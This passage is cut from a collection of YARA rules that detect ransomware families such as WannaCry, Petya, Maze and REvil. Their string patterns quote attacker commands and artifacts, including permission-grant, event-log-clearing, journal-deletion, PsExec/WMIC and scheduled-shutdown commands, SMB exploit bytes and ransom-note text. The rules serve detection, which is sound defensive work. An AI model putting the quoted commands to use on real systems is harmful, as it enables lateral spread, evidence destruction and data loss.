meta: description = "Specific sample match for WannaCryptor" MD5 = "4da1f312a214c07143abeeafb695d904" SHA1 = "b629f072c9241fd2451f1cbca2290197e72a8f5e" SHA256 = "aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c" INFO = "Looks for offsets of r.wry and s.wry instances" strings: $rwnry = { 72 2e 77 72 79 } $swnry = { 73 2e 77 72 79 } condition: $rwnry at 88195 and $swnry at 88656 and $rwnry at 4495639 } rule NHS_Strain_Wanna: NHS_Strain_Wanna { meta: description = "Detection for worm-strain bundle of Wcry, DOublePulsar" MD5 = "db349b97c37d22f5ea1d1841e3c89eb4" SHA1 = "e889544aff85ffaf8b0d0da705105dee7c97fe26" SHA256 = "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" INFO = "Looks for specific offsets of c.wnry and t.wnry strings" strings: $cwnry = { 63 2e 77 6e 72 79 } $twnry = { 74 2e 77 6e 72 79 } condition: $cwnry at 262324 and $twnry at 267672 and $cwnry at 284970 } rule ransom_telefonica : TELEF { meta: author = "Jaume Martin <@Xumeiquer>" description = "Ransmoware Telefonica" date = "2017-05-13" reference = "http://www.elmundo.es/tecnologia/2017/05/12/59158a8ce5fdea194f8b4616.html" md5 = "7f7ccaa16fb15eb1c7399d422f8363e8" sha256 = "2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd" strings: $a = "RegCreateKeyW" wide ascii nocase $b = "cmd.exe /c" $c = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" ascii $d = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" ascii $e = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" ascii $f = "tasksche.exe" condition: uint16(0) == 0x5A4D and $a and for all of ($b, $c, $d, $e, $f) : (@ > @a) } rule Wanna_Cry_Ransomware_Generic { meta: description = "Detects WannaCry Ransomware on Disk and in Virtual Page" author = "US-CERT Code Analysis Team" reference = "not set" date = "2017/05/12" hash0 = "4DA1F312A214C07143ABEEAFB695D904" strings: $s0 = {410044004D0049004E0024} $s1 = "WannaDecryptor" $s2 = "WANNACRY" $s3 = "Microsoft Enhanced RSA and AES Cryptographic" $s4 = "PKS" $s5 = "StartTask" $s6 = "wcry@123" $s7 = {2F6600002F72} $s8 = "unzip 0.15 Copyrigh" $s9 = "Global\\WINDOWS_TASKOSHT_MUTEX" $s10 = "Global\\WINDOWS_TASKCST_MUTEX" $s11 = {7461736B736368652E657865000000005461736B5374617274000000742E776E7279000069636163} $s12 = {6C73202E202F6772616E742045766572796F6E653A46202F54202F43202F5100617474726962202B68} $s13 = "WNcry@2ol7" $s14 = "wcry@123" $s15 = "Global\\MsWinZonesCacheCounterMutexA" condition: $s0 and $s1 and $s2 and $s3 or $s4 and $s5 and $s6 and $s7 or $s8 and $s9 and $s10 or $s11 and $s12 or $s13 or $s14 or $s15 } rule WannaCry_Ransomware { meta: description = "Detects WannaCry Ransomware" author = "Florian Roth (with the help of binar.ly)" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" strings: $x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii $x2 = "taskdl.exe" fullword ascii $x3 = "tasksche.exe" fullword ascii $x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii $x5 = "WNcry@2ol7" fullword ascii $x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii $x7 = "mssecsvc.exe" fullword ascii $x8 = "C:\\%s\\qeriuwjhrf" fullword ascii $x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii $s1 = "C:\\%s\\%s" fullword ascii $s2 = "<!-- Windows 10 --> " fullword ascii $s3 = "cmd.exe /c \"%s\"" fullword ascii $s4 = "msg/m_portuguese.wnry" fullword ascii $s5 = "\\\\192.168.56.20\\IPC$" fullword wide $s6 = "\\\\172.16.99.5\\IPC$" fullword wide $op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 } $op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 } $op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 } $op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c } $op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 } $op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 } condition: uint16(0) == 0x5a4d and filesize < 10000KB and ( 1 of ($x*) and 1 of ($s*) or 3 of ($op*) ) } rule WannaCry_Ransomware_Gen { meta: description = "Detects WannaCry Ransomware" author = "Florian Roth (based on rule by US CERT)" reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A" date = "2017-05-12" hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05" hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df" hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359" strings: $s1 = "__TREEID__PLACEHOLDER__" fullword ascii $s2 = "__USERID__PLACEHOLDER__" fullword ascii $s3 = "Windows for Workgroups 3.1a" fullword ascii $s4 = "PC NETWORK PROGRAM 1.0" fullword ascii $s5 = "LANMAN1.0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule WannCry_m_vbs { meta: description = "Detects WannaCry Ransomware VBS" author = "Florian Roth" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b" strings: $x1 = ".TargetPath = \"C:\\@" ascii $x2 = ".CreateShortcut(\"C:\\@" ascii $s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii condition: ( uint16(0) == 0x4553 and filesize < 1KB and all of them ) } rule WannCry_BAT { meta: description = "Detects WannaCry Ransomware BATCH File" author = "Florian Roth" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077" strings: $s1 = "@.exe\">> m.vbs" ascii $s2 = "cscript.exe //nologo m.vbs" fullword ascii $s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii $s4 = "echo om.Save>> m.vbs" fullword ascii condition: ( uint16(0) == 0x6540 and filesize < 1KB and 1 of them ) } rule WannaCry_RansomNote { meta: description = "Detects WannaCry Ransomware Note" author = "Florian Roth" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e" strings: $s1 = "A: Don't worry about decryption." fullword ascii $s2 = "Q: What's wrong with my files?" fullword ascii condition: ( uint16(0) == 0x3a51 and filesize < 2KB and all of them ) } /* Kaspersky Rule */ rule lazaruswannacry { meta: description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta" date = "2017-05-15" reference = "https://twitter.com/neelmehta/status/864164081116225536" author = "Costin G. Raiu, Kaspersky Lab" version = "1.0" hash = "9c7c7149387a1c79679a87dd1ba755bc" hash = "ac21c8ad899727137c4b94458d7aa8d8" strings: $a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46 56 E8 } $a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 2B C0 2C C0 FF FE } condition: uint16(0) == 0x5A4D and filesize < 15000000 and all of them } /* Cylance Rule */ import "pe" rule WannaCry_Ransomware_Dropper { meta: description = "WannaCry Ransomware Dropper" reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html" date = "2017-05-12" strings: $s1 = "cmd.exe /c \"%s\"" fullword ascii $s2 = "tasksche.exe" fullword ascii $s3 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii $s4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 4MB and all of them } rule WannaCry_SMB_Exploit { meta: description = "WannaCry SMB Exploit" reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html" date = "2017-05-12" strings: $s1 = { 53 4D 42 72 00 00 00 00 18 53 C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE 00 00 40 00 00 62 00 02 50 43 20 4E 45 54 57 4F 52 4B 20 50 52 4F 47 52 41 4D 20 31 2E 30 00 02 4C 41 4E 4D 41 4E 31 2E 30 00 02 57 69 6E 64 6F 77 73 20 66 6F 72 20 57 6F 72 6B 67 72 6F 75 70 73 20 33 2E 31 61 00 02 4C 4D 31 2E 32 58 30 30 32 00 02 4C 41 4E 4D 41 4E 32 2E 31 00 02 4E 54 20 4C 4D 20 30 2E 31 32 00 00 00 00 00 00 00 88 FF 53 4D 42 73 00 00 00 00 18 07 C0 } condition: uint16(0) == 0x5a4d and filesize < 4MB and all of them and pe.imports("ws2_32.dll", "connect") and pe.imports("ws2_32.dll", "send") and pe.imports("ws2_32.dll", "recv") and pe.imports("ws2_32.dll", "socket") and pe.imports("ws2_32.dll", "closesocket") } rule wannacry_static_ransom : wannacry_static_ransom { meta: description = "Detects WannaCryptor spreaded during 2017-May-12th campaign and variants" author = "Blueliv" reference = "https://blueliv.com/research/wannacrypt-malware-analysis/" date = "2017-05-15" strings: $mutex01 = "Global\\MsWinZonesCacheCounterMutexA" ascii $lang01 = "m_bulgarian.wnr" ascii $lang02 = "m_vietnamese.wnry" ascii $startarg01 = "StartTask" ascii $startarg02 = "TaskStart" ascii $startarg03 = "StartSchedule" ascii $wcry01 = "WanaCrypt0r" ascii wide $wcry02 = "WANACRY" ascii $wcry03 = "WANNACRY" ascii $wcry04 = "WNCRYT" ascii wide $forig01 = ".wnry\x00" ascii $fvar01 = ".wry\x00" ascii condition: ($mutex01 or any of ($lang*)) and ( $forig01 or all of ($fvar*) ) and any of ($wcry*) and any of ($startarg*) } rule wannacry_memory_ransom : wannacry_memory_ransom { meta: description = "Detects WannaCryptor spreaded during 2017-May-12th campaign and variants in memory" author = "Blueliv" reference = "https://blueliv.com/research/wannacrypt-malware-analysis/" date = "2017-05-15" strings: $s01 = "%08X.eky" $s02 = "%08X.pky" $s03 = "%08X.res" $s04 = "%08X.dky" $s05 = "@WanaDecryptor@.exe" condition: all of them } rule worm_ms17_010 : worm_ms17_010 { meta: description = "Detects Worm used during 2017-May-12th WannaCry campaign, which is based on ETERNALBLUE" author = "Blueliv" reference = "https://blueliv.com/research/wannacrypt-malware-analysis/" date = "2017-05-15" strings: $s01 = "__TREEID__PLACEHOLDER__" ascii $s02 = "__USERID__PLACEHOLDER__@" ascii $s03 = "SMB3" $s05 = "SMBu" $s06 = "SMBs" $s07 = "SMBr" $s08 = "%s -m security" ascii $s09 = "%d.%d.%d.%d" $payloadwin2000_2195 = "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00" $payload2000_50 = "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00" condition: all of them } rule Maze { meta: description = "Identifies Maze ransomware in memory or unpacked." author = "@bartblaze" date = "2019-11" tlp = "White" strings: $ = "Enc: %s" ascii wide $ = "Encrypting whole system" ascii wide $ = "Encrypting specified folder in --path parameter..." ascii wide $ = "!Finished in %d ms!" ascii wide $ = "--logging" ascii wide $ = "--nomutex" ascii wide $ = "--noshares" ascii wide $ = "--path" ascii wide $ = "Logging enabled | Maze" ascii wide $ = "NO SHARES | " ascii wide $ = "NO MUTEX | " ascii wide $ = "Encrypting:" ascii wide $ = "You need to buy decryptor in order to restore the files." ascii wide $ = "Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms" ascii wide $ = "%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s" ascii wide $ = "DECRYPT-FILES.txt" ascii wide fullword condition: 5 of them } rule ransomware_PetrWrap { meta: copyright= "Kaspersky Lab" description = "Rule to detect PetrWrap ransomware samples" reference = "https://securelist.com/schroedingers-petya/78870/" last_modified = "2017-06-27" author = "Kaspersky Lab" hash = "71B6A493388E7D0B40C83CE903BC6B04" version = "1.0" strings: $a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcqYLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgqCXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide $a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide $a3 = "DESTROY ALL OF YOUR DATA PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii $a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii $a5 = "wowsmith123456posteo.net." fullword wide condition: uint16(0) == 0x5A4D and filesize < 1000000 and any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-03-24 Identifier: Petya Ransomware */ /* Rule Set ----------------------------------------------------------------- */ rule Petya_Ransomware { meta: description = "Detects Petya Ransomware" author = "Florian Roth" reference = "http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html" date = "2016-03-24" hash = "26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739" strings: $a1 = "<description>WinRAR SFX module</description>" fullword ascii $s1 = "BX-Proxy-Manual-Auth" fullword wide $s2 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii $s3 = "X-HTTP-Attempts" fullword wide $s4 = "@CommandLineMode" fullword wide $s5 = "X-Retry-After" fullword wide condition: uint16(0) == 0x5a4d and filesize < 500KB and $a1 and 3 of ($s*) } rule Ransom_Petya { meta: description = "Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015" author = "CCN-CERT" version = "1.0" strings: $a1 = { C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2 } $a2 = { 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6 } $a3 = { 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00 } condition: all of them } rule FE_CPE_MS17_010_RANSOMWARE { meta:version="1.1" //filetype="PE" author="Ian.Ahl@fireeye.com @TekDefense, Nicholas.Carr@mandiant.com @ItsReallyNick" date="2017-06-27" description="Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec" reference = "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html" strings: // DRIVE USAGE $dmap01 = "\\\\.\\PhysicalDrive" nocase ascii wide $dmap02 = "\\\\.\\PhysicalDrive0" nocase ascii wide $dmap03 = "\\\\.\\C:" nocase ascii wide $dmap04 = "TERMSRV" nocase ascii wide $dmap05 = "\\admin$" nocase ascii wide $dmap06 = "GetLogicalDrives" nocase ascii wide $dmap07 = "GetDriveTypeW" nocase ascii wide // RANSOMNOTE $msg01 = "WARNING: DO NOT TURN OFF YOUR PC!" nocase ascii wide $msg02 = "IF YOU ABORT THIS PROCESS" nocase ascii wide $msg03 = "DESTROY ALL OF YOUR DATA!" nocase ascii wide $msg04 = "PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" nocase ascii wide $msg05 = "your important files are encrypted" ascii wide $msg06 = "Your personal installation key" nocase ascii wide $msg07 = "worth of Bitcoin to following address" nocase ascii wide $msg08 = "CHKDSK is repairing sector" nocase ascii wide $msg09 = "Repairing file system on " nocase ascii wide $msg10 = "Bitcoin wallet ID" nocase ascii wide $msg11 = "wowsmith123456@posteo.net" nocase ascii wide $msg12 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" nocase ascii wide $msg_pcre = /(en|de)crypt(ion|ed\.)/ // FUNCTIONALITY, APIS $functions01 = "need dictionary" nocase ascii wide $functions02 = "comspec" nocase ascii wide $functions03 = "OpenProcessToken" nocase ascii wide $functions04 = "CloseHandle" nocase ascii wide $functions05 = "EnterCriticalSection" nocase ascii wide $functions06 = "ExitProcess" nocase ascii wide $functions07 = "GetCurrentProcess" nocase ascii wide $functions08 = "GetProcAddress" nocase ascii wide $functions09 = "LeaveCriticalSection" nocase ascii wide $functions10 = "MultiByteToWideChar" nocase ascii wide $functions11 = "WideCharToMultiByte" nocase ascii wide $functions12 = "WriteFile" nocase ascii wide $functions13 = "CoTaskMemFree" nocase ascii wide $functions14 = "NamedPipe" nocase ascii wide $functions15 = "Sleep" nocase ascii wide // imported, not in strings // COMMANDS // -- Clearing event logs & USNJrnl $cmd01 = "wevtutil cl Setup" ascii wide nocase $cmd02 = "wevtutil cl System" ascii wide nocase $cmd03 = "wevtutil cl Security" ascii wide nocase $cmd04 = "wevtutil cl Application" ascii wide nocase $cmd05 = "fsutil usn deletejournal" ascii wide nocase // -- Scheduled task $cmd06 = "schtasks " nocase ascii wide $cmd07 = "/Create /SC " nocase ascii wide $cmd08 = " /TN " nocase ascii wide $cmd09 = "at %02d:%02d %ws" nocase ascii wide $cmd10 = "shutdown.exe /r /f" nocase ascii wide // -- Sysinternals/PsExec and WMIC $cmd11 = "-accepteula -s" nocase ascii wide $cmd12 = "wmic" $cmd13 = "/node:" nocase ascii wide $cmd14 = "process call create" nocase ascii wide condition: // (uint16(0) == 0x5A4D) 3 of ($dmap*) and 2 of ($msg*) and 9 of ($functions*) and 7 of ($cmd*) } rule petya_eternalblue : petya_eternalblue { meta: author = "blueliv" description = "Based on spreading petya version: 2017-06-28" reference = "https://blueliv.com/petya-ransomware-cyber-attack-is-spreading-across-the-globe-part-2/" strings: /* Some commands executed by the Petya variant */ $cmd01 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%0" wide $cmd02 = "shutdown.exe /r /f" wide $cmd03 = "%s \\\\%s -accepteula -s" wide $cmd04 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1" wide /* Strings of encrypted files */ $str01 = "they have been encrypted. Perhaps you are busy looking" wide /* MBR/VBR payload */ $mbr01 = {00 00 00 55 aa e9 ?? ??} condition: all of them } rule pico_ransomware { meta: description = "Rule to detect Pico Ransomware" author = "Marc Rivero | @seifreed" reference = "https://twitter.com/siri_urz/status/1035138577934557184" strings: $s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii $s2 = "\\Downloads\\README.txt" fullword ascii $s3 = "\\Music\\README.txt" fullword ascii $s4 = "\\Videos\\README.txt" fullword ascii $s5 = "\\Pictures\\README.txt" fullword ascii $s6 = "\\Desktop\\README.txt" fullword ascii $s7 = "\\Documents\\README.txt" fullword ascii $s8 = "/c taskkill /im " fullword ascii $s9 = "\\AppData\\Roaming\\" fullword ascii $s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide $s11 = "AppData\\Roaming" fullword ascii $s12 = "\\Downloads" fullword ascii $s13 = "operator co_await" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 700KB ) and all of them } rule Revil_Ransomware : ransomware { meta: author = "Josh Lemon" description = "Detects REvil Linux - Revix 1.1 and 1.2" reference = "https://angle.ankura.com/post/102hcny/revix-linux-ransomware" date = "2021-11-04" version = "1.1" hash1 = "f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5" hash2 = "559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7" hash3 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4" strings: $s1 = "Usage example: elf.exe --path /vmfs/ --threads 5" fullword ascii $s2 = "uname -a && echo \" | \" && hostname" fullword ascii $s3 = "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list" ascii $s4 = "awk -F \"\\\"*,\\\"*\" '{system(\"esxcli" ascii $s5 = "--silent (-s) use for not stoping VMs mode" fullword ascii $s6 = "!!!BY DEFAULT THIS SOFTWARE USES 50 THREADS!!!" fullword ascii $s7 = "%d:%d: Comment not allowed here" fullword ascii $s8 = "Error decoding user_id %d " fullword ascii $s9 = "Error read urandm line %d!" fullword ascii $s10 = "%d:%d: Unexpected `%c` in comment opening sequence" fullword ascii $s11 = "%d:%d: Unexpected EOF in block comment" fullword ascii $s12 = "Using silent mode, if you on esxi - stop VMs manualy" fullword ascii $s13 = "rand: try to read %hu but get %lu bytes" fullword ascii $s14 = "Revix" fullword ascii $s15 = "without --path encrypts current dir" fullword ascii $e1 = "[%s] already encrypted" fullword ascii $e2 = "File [%s] was encrypted" fullword ascii $e3 = "File [%s] was NOT encrypted" fullword ascii $e4 = "Encrypting [%s]" fullword ascii condition: uint16(0) == 0x457f and filesize < 300KB and ( 4 of ($s*) and 2 of ($e*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Ransom_Satana { meta: description = "Regla para detectar Ransom.Satana" author = "CCN-CERT" version = "1.0" strings: $a = { 21 00 73 00 61 00 74 00 61 00 6E 00 61 00 21 00 2E 00 74 00 78 00 74 00 00 } $b = { 74 67 77 79 75 67 77 71 } $c = { 53 77 76 77 6E 67 75 } $d = { 45 6E 75 6D 4C 6F 63 61 6C 52 65 73 } $e = { 57 4E 65 74 4F 70 65 6E 45 6E 75 6D 57 00 } $f = { 21 53 41 54 41 4E 41 21 } condition: $b or $c and $d and $a and $e and $f } rule Ransom_Satana_Dropper { meta: description = "Regla para detectar el dropper de Ransom.Satana" author = "CCN-CERT" version = "1.0" strings: $a = { 25 73 2D 54 72 79 45 78 63 65 70 74 } $b = { 64 3A 5C 6C 62 65 74 77 6D 77 79 5C 75 69 6A 65 75 71 70 6C 66 77 75 62 2E 70 64 62 } $c = { 71 66 6E 74 76 74 68 62 } condition: all of them } rule unpacked_shiva_ransomware { meta: description = "Rule to detect an unpacked sample of Shiva ransopmw" author = "Marc Rivero | @seifreed" reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096" strings: $s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii $s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide $s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide $s4 = "write.php?info=" fullword wide $s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide $s6 = " * Do not rename encrypted files." fullword wide $s7 = ".compositiontemplate" fullword wide $s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide $s9 = "\\READ_IT.txt" fullword wide $s10 = ".lastlogin" fullword wide $s11 = ".logonxp" fullword wide $s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide $s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 800KB ) and all of them } rule sigma_ransomware { meta: author = "J from THL <j@techhelplist.com>" date = "20180509" reference1 = "https://www.virustotal.com/#/file/705ad78bf5503e6022f08da4c347afb47d4e740cfe6c39c08550c740c3be96ba" reference2 = "https://www.virustotal.com/#/file/bb3533440c27a115878ae541aba3bda02d441f3ea1864b868862255aabb0c8ff" version = 1 maltype = "Ransomware" filetype = "memory" strings: $a = ".php?" $b = "uid=" $c = "&uname=" $d = "&os=" $e = "&pcname=" $f = "&total=" $g = "&country=" $h = "&network=" $i = "&subid=" condition: all of them } rule SnakeRansomware { meta: Author = "Nishan Maharjan" Description = "A yara rule to catch snake ransomware" Reference = "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017" Data = "15th May 2020" strings: $go_build_id = "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\"" $math_rand_seed_calling = { 89 C8 BB 00 CA 9A 3B 89 D1 F7 E3 81 E1 FF FF FF 3F 89 C3 01 C8 89 C6 05 00 00 1A 3D 89 04 24 69 ED 00 CA 9A 3B 01 EA 89 CD C1 F9 1F 01 EB 11 CA 81 C6 00 00 1A 3D 81 D2 EB 03 B2 A1 89 54 24 04 E8 10 62 F6 FF } $encryption_function = {64 8B 0D 14 00 00 00 8B 89 00 00 00 00 3B 61 08 0F 86 38 01 00 00 83 EC 3C E8 32 1A F3 FF 8D 7C 24 28 89 E6 E8 25 EA F0 FF 8B 44 24 2C 8B 4C 24 28 89 C2 C1 E8 1F C1 E0 1F 85 C0 0F 84 FC 00 00 00 D1 E2 89 CB C1 E9 1F 09 D1 89 DA D1 E3 C1 EB 1F 89 CD D1 E1 09 D9 89 CB 81 C1 80 7F B1 D7 C1 ED 1F 81 C3 80 7F B1 D7 83 D5 0D 89 C8 BB 00 CA 9A 3B 89 D1 F7 E3 81 E1 FF FF FF 3F 89 C3 01 C8 89 C6 05 00 00 1A 3D 89 04 24 69 ED 00 CA 9A 3B 01 EA 89 CD C1 F9 1F 01 EB 11 CA 81 C6 00 00 1A 3D 81 D2 EB 03 B2 A1 89 54 24 04 E8 10 62 F6 FF 31 C0 EB 79 89 44 24 20 8B 4C 24 40 8D 14 C1 8B 1A 89 5C 24 24 8B 52 04 89 54 24 1C C7 04 24 05 00 00 00 E8 48 FE FF FF 8B 44 24 08 8B 4C 24 04 C7 04 24 00 00 00 00 8B 54 24 24 89 54 24 04 8B 5C 24 1C 89 5C 24 08 89 4C 24 0C 89 44 24 10 E8 EC DD EF FF 8B 44 24 18 8B 4C 24 14 89 4C 24 08 89 44 24 0C 8B 44 24 24 89 04 24 8B 44 24 1C 89 44 24 04 E8 68 BB F3 FF 8B 44 24 20 40} condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule stampado_overlay { meta: description = "Catches Stampado samples looking for \\r at the beginning of PE overlay section" reference = "" author = "Fernando Merces, FTR, Trend Micro" date = "2016-07" md5 = "a393b9536a1caa34914636d3da7378b5" md5 = "dbf3707a9cd090853a11dda9cfa78ff0" md5 = "dd5686ca7ec28815c3cf3ed3dbebdff2" md5 = "6337f0938e4a9c0ef44ab99deb0ef466" condition: pe.characteristics == 0x122 and pe.number_of_sections == 5 and pe.imports("VERSION.dll", "VerQueryValueW") and uint8(pe.sections[4].raw_data_offset + pe.sections[4].raw_data_size) == 0x0d } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule TeslaCrypt { meta: description = "Regla para detectar Tesla con md5" author = "CCN-CERT" version = "1.0" strings: $ = { 4E 6F 77 20 69 74 27 73 20 25 49 3A 25 4D 25 70 2E 00 00 00 76 61 6C 20 69 73 20 25 64 0A 00 00 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Win32Toxic : tox ransomware { meta: author = "@GelosSnake" date = "2015-06-02" description = "https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us" hash0 = "70624c13be4d8a4c1361be38b49cb3eb" hash1 = "4f20d25cd3ae2e5c63d451d095d97046" hash2 = "e0473434cc83b57c4b579d585d4c4c57" hash3 = "c52090d184b63e5cc71b524153bb079e" hash4 = "7ac0b49baba9914b234cde62058c96a5" hash5 = "048c007de4902b6f4731fde45fa8e6a9" hash6 = "238ef3e35b14e304c87b9c62f18953a9" hash7 = "8908ccd681f66429c578a889e6e708e1" hash8 = "de9fe2b7d9463982cc77c78ee51e4d51" hash9 = "37add8d26a35a3dc9700b92b67625fa4" hash10 = "a0f30e89a3431fca1d389f90dba1d56e" hash11 = "d4d0658302c731003bf0683127618bd9" hash12 = "d1d89e1c7066f41c1d30985ac7b569db" hash13 = "97d52d7281dfae8ff9e704bf30ce2484" hash14 = "2cc85be01e86e0505697cf61219e66da" hash15 = 